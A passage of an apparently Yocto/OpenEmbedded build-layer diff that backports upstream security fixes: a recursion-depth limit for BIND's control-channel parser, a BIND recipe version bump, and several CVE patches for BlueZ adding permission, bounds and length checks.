+ checksum_rstart = NULL;
+ first_tag = true;
+ alist = isccc_alist_create();
+@@ -628,7 +642,7 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ GET_MEM(key, len, source->rstart);
+ key[len] = '\0'; /* Ensure NUL termination. */
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS)
+ goto bad;
+ if (isccc_alist_define(alist, key, value) == NULL) {
+@@ -661,14 +675,18 @@ table_fromwire(isccc_region_t *source, isccc_region_t *secret,
+ }
+
+ static isc_result_t
+-list_fromwire(isccc_region_t *source, isccc_sexpr_t **listp) {
++list_fromwire(isccc_region_t *source, unsigned int depth, isccc_sexpr_t **listp) {
+ isccc_sexpr_t *list, *value;
+ isc_result_t result;
+
++ if (depth > ISCCC_MAXDEPTH) {
++ return (ISCCC_R_MAXDEPTH);
++ }
++
+ list = NULL;
+ while (!REGION_EMPTY(*source)) {
+ value = NULL;
+- result = value_fromwire(source, &value);
++ result = value_fromwire(source, depth + 1, &value);
+ if (result != ISC_R_SUCCESS) {
+ isccc_sexpr_free(&list);
+ return (result);
+@@ -699,7 +717,7 @@ isccc_cc_fromwire(isccc_region_t *source, isccc_sexpr_t **alistp,
+ if (version != 1)
+ return (ISCCC_R_UNKNOWNVERSION);
+
+- return (table_fromwire(source, secret, algorithm, alistp));
++ return (table_fromwire(source, secret, algorithm, 0, alistp));
+ }
+
+ static isc_result_t
+diff --git a/lib/isccc/include/isccc/result.h b/lib/isccc/include/isccc/result.h
+index 6c79dd7..a85861c 100644
+--- a/lib/isccc/include/isccc/result.h
++++ b/lib/isccc/include/isccc/result.h
+@@ -47,8 +47,10 @@
+ #define ISCCC_R_CLOCKSKEW (ISC_RESULTCLASS_ISCCC + 4)
+ /*% Duplicate */
+ #define ISCCC_R_DUPLICATE (ISC_RESULTCLASS_ISCCC + 5)
++/*% Maximum recursion depth */
++#define ISCCC_R_MAXDEPTH (ISC_RESULTCLASS_ISCCC + 6)
+
+-#define ISCCC_R_NRESULTS 6 /*%< Number of results */
++#define ISCCC_R_NRESULTS 7 /*%< Number of results */
+
+ ISC_LANG_BEGINDECLS
+
+diff --git a/lib/isccc/result.c b/lib/isccc/result.c
+index 8419bbb..325200b 100644
+--- a/lib/isccc/result.c
++++ b/lib/isccc/result.c
+@@ -40,7 +40,8 @@ static const char *text[ISCCC_R_NRESULTS] = {
+ "bad auth", /* 3 */
+ "expired", /* 4 */
+ "clock skew", /* 5 */
+- "duplicate" /* 6 */
++ "duplicate", /* 6 */
++ "max depth", /* 7 */
+ };
+
+ static const char *ids[ISCCC_R_NRESULTS] = {
+@@ -50,6 +51,7 @@ static const char *ids[ISCCC_R_NRESULTS] = {
+ "ISCCC_R_EXPIRED",
+ "ISCCC_R_CLOCKSKEW",
+ "ISCCC_R_DUPLICATE",
++ "ISCCC_R_MAXDEPTH",
+ };
+
+ #define ISCCC_RESULT_RESULTSET 2
+--
+2.25.1
+
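The pattern behind the fix above is to thread an explicit depth counter through every (mutually) recursive parser function and reject the input once a fixed limit is exceeded, so attacker-controlled nesting cannot exhaust the stack. A minimal, self-contained sketch of that idea in C follows; the nested-parenthesis grammar and the limit of 10 are illustrative assumptions, not the BIND code:

    #include <stdio.h>

    #define MAXDEPTH 10   /* illustrative limit, same spirit as ISCCC_MAXDEPTH */

    /* Parse one nested group such as "((()))", failing once the nesting
     * exceeds MAXDEPTH instead of recursing further. */
    static int parse_group(const char **p, unsigned int depth)
    {
        if (depth > MAXDEPTH)
            return -1;                 /* too deep: refuse, do not recurse */

        if (**p != '(')
            return -1;
        (*p)++;                        /* consume '(' */

        while (**p == '(') {
            if (parse_group(p, depth + 1) != 0)   /* child level: depth + 1 */
                return -1;
        }

        if (**p != ')')
            return -1;
        (*p)++;                        /* consume ')' */
        return 0;
    }

    int main(void)
    {
        const char *shallow = "((()))";
        const char *deep = "(((((((((((((((((((())))))))))))))))))))";
        const char *p = shallow;

        printf("shallow: %s\n", parse_group(&p, 0) == 0 ? "accepted" : "rejected");
        p = deep;
        printf("deep:    %s\n", parse_group(&p, 0) == 0 ? "accepted" : "rejected");
        return 0;
    }

The important detail, mirrored in the patch, is that the counter is passed down by value and incremented at every call site, so the check at function entry bounds the entire call chain.
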
diff --git a/meta/recipes-connectivity/bind/bind_9.11.22.bb b/meta/recipes-connectivity/bind/bind_9.11.37.bb
index 3b4a299b36..95bb5be005 100644
--- a/meta/recipes-connectivity/bind/bind_9.11.22.bb
+++ b/meta/recipes-connectivity/bind/bind_9.11.37.bb
@@ -1,9 +1,10 @@
SUMMARY = "ISC Internet Domain Name Server"
HOMEPAGE = "https://www.isc.org/bind/"
+DESCRIPTION = "BIND 9 provides a full-featured Domain Name Server system"
SECTION = "console/network"
LICENSE = "ISC & BSD"
-LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=bf39058a7f64b2a934ce14dc9ec1dd45"
+LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=89a97ebbf713f7125fe5c02223d3ae95"
DEPENDS = "openssl libcap zlib"
@@ -18,9 +19,14 @@ SRC_URI = "https://ftp.isc.org/isc/bind9/${PV}/${BPN}-${PV}.tar.gz \
file://0001-configure.in-remove-useless-L-use_openssl-lib.patch \
file://0001-named-lwresd-V-and-start-log-hide-build-options.patch \
file://0001-avoid-start-failure-with-bind-user.patch \
+ file://CVE-2022-2795.patch \
+ file://CVE-2022-38177.patch \
+ file://CVE-2022-38178.patch \
+ file://CVE-2023-2828.patch \
+ file://CVE-2023-3341.patch \
"
-SRC_URI[sha256sum] = "afc6d8015006f1cabf699ff19f517bb8fd9c1811e5231f26baf51c3550262ac9"
+SRC_URI[sha256sum] = "0d8efbe7ec166ada90e46add4267b7e7c934790cba9bd5af6b8380a4fbfb5aff"
UPSTREAM_CHECK_URI = "https://ftp.isc.org/isc/bind9/"
# stay at 9.11 until 9.16, from 9.16 follow the ESV versions divisible by 4
diff --git a/meta/recipes-connectivity/bluez5/bluez5.inc b/meta/recipes-connectivity/bluez5/bluez5.inc
index f34ba0dce5..74fd344170 100644
--- a/meta/recipes-connectivity/bluez5/bluez5.inc
+++ b/meta/recipes-connectivity/bluez5/bluez5.inc
@@ -7,6 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
file://COPYING.LIB;md5=fb504b67c50331fc78734fed90fb0e09 \
file://src/main.c;beginline=1;endline=24;md5=9bc54b93cd7e17bf03f52513f39f926e"
DEPENDS = "dbus glib-2.0"
+RDEPENDS:${PN} += "dbus"
PROVIDES += "bluez-hcidump"
RPROVIDES_${PN} += "bluez-hcidump"
@@ -52,6 +53,13 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/bluetooth/bluez-${PV}.tar.xz \
${@bb.utils.contains('DISTRO_FEATURES', 'systemd', '', 'file://0001-Allow-using-obexd-without-systemd-in-the-user-sessio.patch', d)} \
file://0001-tests-add-a-target-for-building-tests-without-runnin.patch \
file://0001-test-gatt-Fix-hung-issue.patch \
+ file://CVE-2021-0129.patch \
+ file://CVE-2021-3588.patch \
+ file://CVE-2021-3658.patch \
+ file://CVE-2022-0204.patch \
+ file://CVE-2022-39176.patch \
+ file://CVE-2022-3637.patch \
+ file://CVE-2023-45866.patch \
"
S = "${WORKDIR}/bluez-${PV}"
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
new file mode 100644
index 0000000000..b39730dc10
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-0129.patch
@@ -0,0 +1,109 @@
+From 00da0fb4972cf59e1c075f313da81ea549cb8738 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 2 Mar 2021 11:38:33 -0800
+Subject: shared/gatt-server: Fix not properly checking for secure flags
+
+When passing the mask to check_permissions all valid permissions for
+the operation must be set including BT_ATT_PERM_SECURE flags.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/patch/?id=00da0fb4972cf59e1c075f313da81ea549cb8738]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+CVE: CVE-2021-0129
+---
+ src/shared/att-types.h | 8 ++++++++
+ src/shared/gatt-server.c | 25 +++++++------------------
+ 2 files changed, 15 insertions(+), 18 deletions(-)
+
+diff --git a/src/shared/att-types.h b/src/shared/att-types.h
+index 7108b4e94..3adc05d9e 100644
+--- a/src/shared/att-types.h
++++ b/src/shared/att-types.h
+@@ -129,6 +129,14 @@ struct bt_att_pdu_error_rsp {
+ #define BT_ATT_PERM_WRITE_SECURE 0x0200
+ #define BT_ATT_PERM_SECURE (BT_ATT_PERM_READ_SECURE | \
+ BT_ATT_PERM_WRITE_SECURE)
++#define BT_ATT_PERM_READ_MASK (BT_ATT_PERM_READ | \
++ BT_ATT_PERM_READ_AUTHEN | \
++ BT_ATT_PERM_READ_ENCRYPT | \
++ BT_ATT_PERM_READ_SECURE)
++#define BT_ATT_PERM_WRITE_MASK (BT_ATT_PERM_WRITE | \
++ BT_ATT_PERM_WRITE_AUTHEN | \
++ BT_ATT_PERM_WRITE_ENCRYPT | \
++ BT_ATT_PERM_WRITE_SECURE)
+
+ /* GATT Characteristic Properties Bitfield values */
+ #define BT_GATT_CHRC_PROP_BROADCAST 0x01
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index b5f7de7dc..970c35f94 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -444,9 +444,7 @@ static void process_read_by_type(struct async_read_op *op)
+ return;
+ }
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -811,9 +809,7 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+@@ -913,9 +909,7 @@ static void handle_read_req(struct bt_att_chan *chan,
+ opcode == BT_ATT_OP_READ_BLOB_REQ ? "Blob " : "",
+ handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1051,9 +1045,8 @@ static void read_multiple_complete_cb(struct gatt_db_attribute *attr, int err,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, next_attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, next_attr,
++ BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1129,9 +1122,7 @@ static void read_multiple_cb(struct bt_att_chan *chan, uint8_t opcode,
+ goto error;
+ }
+
+- ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ |
+- BT_ATT_PERM_READ_AUTHEN |
+- BT_ATT_PERM_READ_ENCRYPT);
++ ecode = check_permissions(data->server, attr, BT_ATT_PERM_READ_MASK);
+ if (ecode)
+ goto error;
+
+@@ -1308,9 +1299,7 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
+- ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE |
+- BT_ATT_PERM_WRITE_AUTHEN |
+- BT_ATT_PERM_WRITE_ENCRYPT);
++ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+
+--
+cgit 1.2.3-1.el7
+
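The fix above replaces three hand-listed permission flags with a single mask that also contains the *_SECURE bits, so no caller can forget one. The sketch below shows why a complete mask matters; the flag values and the simplified check_permissions() are made-up stand-ins, not the actual BlueZ definitions:

    #include <stdio.h>
    #include <stdint.h>

    /* Illustrative permission bits, loosely modelled on ATT-style flags. */
    #define PERM_READ          0x0001
    #define PERM_READ_AUTHEN   0x0002
    #define PERM_READ_ENCRYPT  0x0004
    #define PERM_READ_SECURE   0x0008

    /* One mask covering every read-related bit. */
    #define PERM_READ_MASK     (PERM_READ | PERM_READ_AUTHEN | \
                                PERM_READ_ENCRYPT | PERM_READ_SECURE)

    /* Simplified check: the attribute's permissions are first restricted to
     * the bits the caller asked about; any required bit the link does not
     * provide causes a rejection.  A requirement outside the mask is
     * silently dropped -- exactly the bug class the full mask avoids. */
    static int check_permissions(uint16_t attr_perms, uint16_t mask,
                                 uint16_t link_grants)
    {
        uint16_t required = attr_perms & mask;

        return (required & ~link_grants) ? -1 : 0;
    }

    int main(void)
    {
        uint16_t attr = PERM_READ | PERM_READ_SECURE;  /* needs a secure link */
        uint16_t link = PERM_READ;                     /* plain read only */
        uint16_t partial = PERM_READ | PERM_READ_AUTHEN | PERM_READ_ENCRYPT;

        printf("partial mask: %s\n",
               check_permissions(attr, partial, link) ? "denied" : "allowed");
        printf("full mask:    %s\n",
               check_permissions(attr, PERM_READ_MASK, link) ? "denied" : "allowed");
        return 0;
    }

With the partial mask the SECURE requirement is dropped and the read is wrongly allowed; with the full mask it is correctly denied.
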
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
new file mode 100644
index 0000000000..f52ff47a06
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3588.patch
@@ -0,0 +1,34 @@
+From 3a40bef49305f8327635b81ac8be52a3ca063d5a Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Mon, 4 Jan 2021 10:38:31 -0800
+Subject: [PATCH] gatt: Fix potential buffer out-of-bound
+
+When client features is read, check if the offset is within the cli_feat
+bounds.
+
+Fixes: https://github.com/bluez/bluez/issues/70
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=3a40bef49305f8327635b81ac8be52a3ca063d5a]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+CVE: CVE-2021-3588
+
+---
+ src/gatt-database.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/gatt-database.c b/src/gatt-database.c
+index 90cc4bade..f2d7b5821 100644
+--- a/src/gatt-database.c
++++ b/src/gatt-database.c
+@@ -1075,6 +1075,11 @@ static void cli_feat_read_cb(struct gatt_db_attribute *attrib,
+ goto done;
+ }
+
++ if (offset >= sizeof(state->cli_feat)) {
++ ecode = BT_ATT_ERROR_INVALID_OFFSET;
++ goto done;
++ }
++
+ len = sizeof(state->cli_feat) - offset;
+ value = len ? &state->cli_feat[offset] : NULL;
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
new file mode 100644
index 0000000000..1738ca13da
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
@@ -0,0 +1,95 @@
+From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Thu, 24 Jun 2021 16:32:04 -0700
+Subject: [PATCH] adapter: Fix storing discoverable setting
+
+The discoverable setting shall only be stored when changed via the
+Discoverable property and not when a discovery client sets it, as that
+is considered temporary, just for the lifetime of the discovery.
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/b497b5942a8beb8f89ca1c359c54ad67ec843055]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ src/adapter.c | 35 ++++++++++++++++++++++-------------
+ 1 file changed, 22 insertions(+), 13 deletions(-)
+
+diff --git a/src/adapter.c b/src/adapter.c
+index 12e4ff5c0..663b778e4 100644
+--- a/src/adapter.c
++++ b/src/adapter.c
+@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
+ if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
+ g_dbus_emit_property_changed(dbus_conn, adapter->path,
+ ADAPTER_INTERFACE, "Discoverable");
+- store_adapter_info(adapter);
++ /* Only persist discoverable setting if it was not set
++ * temporarily by discovery.
++ */
++ if (!adapter->discovery_discoverable)
++ store_adapter_info(adapter);
+ btd_adv_manager_refresh(adapter->adv_manager);
+ }
+
+@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
+ static int update_discovery_filter(struct btd_adapter *adapter)
+ {
+ struct mgmt_cp_start_service_discovery *sd_cp;
+- GSList *l;
+-
+
+ DBG("");
+
+@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
+ return -ENOMEM;
+ }
+
+- for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
+- struct discovery_client *client = l->data;
++ /* Only attempt to overwrite current discoverable setting when not
++ * discoverable.
++ */
++ if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
++ GSList *l;
+
+- if (!client->discovery_filter)
+- continue;
++ for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
++ struct discovery_client *client = l->data;
+
+- if (client->discovery_filter->discoverable)
+- break;
+- }
++ if (!client->discovery_filter)
++ continue;
+
+- set_discovery_discoverable(adapter, l ? true : false);
++ if (client->discovery_filter->discoverable) {
++ set_discovery_discoverable(adapter, true);
++ break;
++ }
++ }
++ }
+
+ /*
+ * If filters are equal, then don't update scan, except for when
+@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
+ return 0;
+ }
+
+- if (adapter->discovery_discoverable)
+- set_discovery_discoverable(adapter, false);
++ set_discovery_discoverable(adapter, false);
+
+ /*
+ * In the idle phase of a discovery, there is no need to stop it
+@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
+ g_free(adapter->current_discovery_filter);
+ adapter->current_discovery_filter = NULL;
+
++ set_discovery_discoverable(adapter, false);
+ adapter->discovering = false;
+
+ while (adapter->connections) {
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
new file mode 100644
index 0000000000..646b5ddfc8
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
@@ -0,0 +1,66 @@
+From 0d328fdf6564b67fc2ec3533e3da201ebabcc9e3 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 8 Jun 2021 16:46:49 -0700
+Subject: [PATCH] shared/gatt-server: Fix heap overflow when appending prepare
+ writes
+
+The code shall check if the prepare writes would append more than the
+allowed maximum attribute length.
+
+Fixes https://github.com/bluez/bluez/security/advisories/GHSA-479m-xcq5-9g2q
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/591c546c536b42bef696d027f64aa22434f8c3f0]
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+CVE: CVE-2022-0204
+
+---
+ src/shared/gatt-server.c | 22 ++++++++++++++++++++++
+ 1 file changed, 22 insertions(+)
+
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index 0c25a97..20e14bc 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -816,6 +816,20 @@ static uint8_t authorize_req(struct bt_gatt_server *server,
+ server->authorize_data);
+ }
+
++static uint8_t check_length(uint16_t length, uint16_t offset)
++{
++ if (length > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ if (offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_OFFSET;
++
++ if (length + offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ return 0;
++}
++
+ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ uint16_t length, void *user_data)
+ {
+@@ -846,6 +860,10 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
++ ecode = check_length(length, 0);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+@@ -1353,6 +1371,10 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
++ ecode = check_length(length, offset);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
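The check_length() helper introduced above validates the write length and offset individually, and then their sum, against the maximum attribute size before any permission or copy logic runs. A standalone sketch of that bounds check; the limit and the error codes are placeholders rather than the real BT_ATT_* constants:

    #include <stdio.h>
    #include <stdint.h>

    #define MAX_VALUE_LEN 512   /* placeholder for the maximum attribute size */

    enum { OK = 0, ERR_INVALID_LEN = 1, ERR_INVALID_OFFSET = 2 };

    /* Reject any write whose length, offset, or combined extent would land
     * past the end of the value buffer.  Checking each operand separately
     * yields a precise error; the combined check catches writes that start
     * in bounds but run past the end. */
    static int check_length(uint16_t length, uint16_t offset)
    {
        if (length > MAX_VALUE_LEN)
            return ERR_INVALID_LEN;
        if (offset > MAX_VALUE_LEN)
            return ERR_INVALID_OFFSET;
        if (length + offset > MAX_VALUE_LEN)
            return ERR_INVALID_LEN;
        return OK;
    }

    int main(void)
    {
        printf("len=100 off=0     -> %d\n", check_length(100, 0));     /* 0 */
        printf("len=400 off=200   -> %d\n", check_length(400, 200));   /* 1 */
        printf("len=10  off=60000 -> %d\n", check_length(10, 60000));  /* 2 */
        return 0;
    }

Calling it from both the write and the prepare-write path, as the patch does, keeps queued prepare writes from accumulating past the buffer.
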
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
new file mode 100644
index 0000000000..4ca60f99d5
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
@@ -0,0 +1,39 @@
+From b808b2852a0b48c6f9dbb038f932613cea3126c2 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 09:51:27 +0530
+Subject: [PATCH] CVE-2022-3637
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/monitor/jlink.c?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f]
+CVE: CVE-2022-3637
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+monitor: Fix crash when using RTT backend
+
+This fixes a regression introduced by "monitor: Fix memory leaks".
+The J-Link shared library is in use if jlink_init() returns 0 and thus
+the handle shall not be closed.
+---
+ monitor/jlink.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/monitor/jlink.c b/monitor/jlink.c
+index afa9d93..5bd4aed 100644
+--- a/monitor/jlink.c
++++ b/monitor/jlink.c
+@@ -120,9 +120,12 @@ int jlink_init(void)
+ !jlink.tif_select || !jlink.setspeed ||
+ !jlink.connect || !jlink.getsn ||
+ !jlink.emu_getproductname ||
+- !jlink.rtterminal_control || !jlink.rtterminal_read)
++ !jlink.rtterminal_control || !jlink.rtterminal_read) {
++ dlclose(so);
+ return -EIO;
++ }
+
++ /* don't dlclose(so) here cause symbols from it are in use now */
+ return 0;
+ }
+
+--
+2.25.1
+
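The jlink fix above closes the shared object again when symbol resolution fails, while deliberately keeping it open on success because the resolved symbols remain in use. A generic sketch of that dlopen()/dlsym() lifetime rule; the library name and symbol are hypothetical:

    #include <stdio.h>
    #include <dlfcn.h>

    static int (*plugin_entry)(void);

    /* Load an optional plugin and resolve its entry point.  On failure the
     * handle is released; on success it is intentionally left open, since
     * plugin_entry points into the mapped library and would dangle after
     * dlclose(). */
    static int plugin_init(const char *path)
    {
        void *so = dlopen(path, RTLD_NOW);

        if (!so) {
            fprintf(stderr, "dlopen: %s\n", dlerror());
            return -1;
        }

        plugin_entry = (int (*)(void))dlsym(so, "plugin_entry");
        if (!plugin_entry) {
            dlclose(so);        /* nothing from the library is in use yet */
            return -1;
        }

        /* do not dlclose(so): its symbols are now in use */
        return 0;
    }

    int main(void)
    {
        /* "libexample-plugin.so" is a made-up name for the sketch. */
        if (plugin_init("libexample-plugin.so") != 0)
            fprintf(stderr, "plugin not available, continuing without it\n");
        return 0;
    }

(Link with -ldl on older glibc.) Per the commit message above, the earlier leak fix had closed the handle even on the success path, which is what broke the RTT backend.
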
diff --git a/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
new file mode 100644
index 0000000000..7bd1f5f80f
--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
@@ -0,0 +1,126 @@
+From 752c7f707c3cc1eb12eadc13bc336a5c484d4bdf Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 28 Sep 2022 10:45:53 +0530
+Subject: [PATCH] CVE-2022-39176
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+source/bluez/5.53-0ubuntu3.6]
+CVE: CVE-2022-39176
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/audio/avdtp.c | 56 +++++++++++++++++++++++++++---------------
+ profiles/audio/avrcp.c | 8 ++++++
+ 2 files changed, 44 insertions(+), 20 deletions(-)
+
+diff --git a/profiles/audio/avdtp.c b/profiles/audio/avdtp.c
+index 782268c..0adf413 100644
+--- a/profiles/audio/avdtp.c
++++ b/profiles/audio/avdtp.c
+@@ -1261,43 +1261,53 @@ struct avdtp_remote_sep *avdtp_find_remote_sep(struct avdtp *session,
+ return NULL;
+ }
+
+-static GSList *caps_to_list(uint8_t *data, int size,
++static GSList *caps_to_list(uint8_t *data, size_t size,
+ struct avdtp_service_capability **codec,
+ gboolean *delay_reporting)
+ {
++ struct avdtp_service_capability *cap;
+ GSList *caps;
+- int processed;
+
+ if (delay_reporting)
+ *delay_reporting = FALSE;
+
+- for (processed = 0, caps = NULL; processed + 2 <= size;) {
+- struct avdtp_service_capability *cap;
+- uint8_t length, category;
++ if (size < sizeof(*cap))
++ return NULL;
++
++ for (caps = NULL; size >= sizeof(*cap);) {
++ struct avdtp_service_capability *cpy;
+
+- category = data[0];
+- length = data[1];
++ cap = (struct avdtp_service_capability *)data;
+
+- if (processed + 2 + length > size) {
++ if (sizeof(*cap) + cap->length > size) {
+ error("Invalid capability data in getcap resp");
+ break;
+ }
+
+- cap = g_malloc(sizeof(struct avdtp_service_capability) +
+- length);
+- memcpy(cap, data, 2 + length);
++ if (cap->category == AVDTP_MEDIA_CODEC &&
++ cap->length < sizeof(**codec)) {
++ error("Invalid codec data in getcap resp");
++ break;
++ }
++
++ cpy = btd_malloc(sizeof(*cpy) + cap->length);
++ memcpy(cpy, cap, sizeof(*cap) + cap->length);
+
+- processed += 2 + length;
+- data += 2 + length;
++ size -= sizeof(*cap) + cap->length;
++ data += sizeof(*cap) + cap->length;
+
+- caps = g_slist_append(caps, cap);
++ caps = g_slist_append(caps, cpy);
+
+- if (category == AVDTP_MEDIA_CODEC &&
+- length >=
+- sizeof(struct avdtp_media_codec_capability))
+- *codec = cap;
+- else if (category == AVDTP_DELAY_REPORTING && delay_reporting)
+- *delay_reporting = TRUE;
++ switch (cap->category) {
++ case AVDTP_MEDIA_CODEC:
++ if (codec)
++ *codec = cpy;
++ break;
++ case AVDTP_DELAY_REPORTING:
++ if (delay_reporting)
++ *delay_reporting = TRUE;
++ break;
++ }
+ }
+
+ return caps;
+@@ -1494,6 +1504,12 @@ static gboolean avdtp_setconf_cmd(struct avdtp *session, uint8_t transaction,
+ &stream->codec,
+ &stream->delay_reporting);
+
++ if (!stream->caps || !stream->codec) {
++ err = AVDTP_UNSUPPORTED_CONFIGURATION;
++ category = 0x00;
++ goto failed_stream;
++ }
++
+ /* Verify that the Media Transport capability's length = 0. Reject otherwise */
+ for (l = stream->caps; l != NULL; l = g_slist_next(l)) {
+ struct avdtp_service_capability *cap = l->data;
+diff --git a/profiles/audio/avrcp.c b/profiles/audio/avrcp.c
+index d9471c0..0233d53 100644
+--- a/profiles/audio/avrcp.c
++++ b/profiles/audio/avrcp.c
+@@ -1916,6 +1916,14 @@ static size_t handle_vendordep_pdu(struct avctp *conn, uint8_t transaction,
+ goto err_metadata;
+ }
+
++ operands += sizeof(*pdu);
++ operand_count -= sizeof(*pdu);
++
++ if (pdu->params_len != operand_count) {
++ DBG("AVRCP PDU parameters length don't match");
++ pdu->params_len = operand_count;
++ }
++
+ for (handler = session->control_handlers; handler->pdu_id; handler++) {
+ if (handler->pdu_id == pdu->pdu_id)
+ break;
+--
+2.25.1
+
